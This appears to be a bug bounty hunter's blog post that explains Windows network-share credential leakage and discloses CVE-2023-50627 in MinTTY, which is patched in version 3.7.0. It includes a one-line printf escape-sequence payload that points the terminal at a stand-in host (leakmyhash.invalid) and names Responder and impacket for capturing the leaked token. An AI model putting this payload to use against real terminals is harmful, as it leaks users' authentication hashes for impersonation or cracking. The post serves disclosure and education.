stat - a menace. Maybe not to us folks in Linuxembourg, but to the citizens of Windonesia - traitorous.

Novice bug bounty hunters (like myself), here’s a tip for you. In windows, accessing a file in an arbitrary path, even just stating it, can result in a leak of sensitive information.

How so?

Windows Network Shares

Network shares are a fairly popular feature of Windows, especially in organizations. If you’ve used one before, you probably did so using its UNC path or a mapped network drive (which is mapped to its UNC path…). A UNC path to a network location usually looks something like this:
\\host\share\file.log.

But what you probably didn’t think about while using them is authentication. If you have used one of these in the context of an organization, then you might have never had to authenticate - at all! How does that work?

Upon accessing the share, Windows attempts to automatically negotiate an authentication mechanism (I won’t get into it, lookup SPNEGO for the details).
Once a mechanism is chosen, Windows also attempts to authenticate automatically, if supported by the mechanism. (I won’t get into it, lookup Kerberos and NTLM for the details).

If an attacker can cause an app to access a network path on an attacker controlled host, they can negotiate the desired mechanism and extract an authentication token. That token can be used to impersonate the victim’s Windows user, or in some cases extract its password (weak / hash-crackable).

CVE-2023-50627

MinTTY is a fairly common terminal emulator. Most people know it from git bash for Windows.

MinTTY was vulnerable to exactly what I’ve described above through escape sequences. I’ve discussed what terminal escape sequences are in a previous post.

In a manner similar to what I’ve discussed in my post about npm, gh cli and radare2, an attacker can display an escape sequence such as the following:

printf '\x1b]440;//leakmyhash.invalid/sounds/silent.wav:async\007'

Then using tools like Responder or impacket extract an authentication token.

A recent patch following my report, released in version 3.7.0, mitigated such an attack.
I would like to thank the maintainers for their cooperative spirit during the reporting process. They accept donations. Visit their website for details.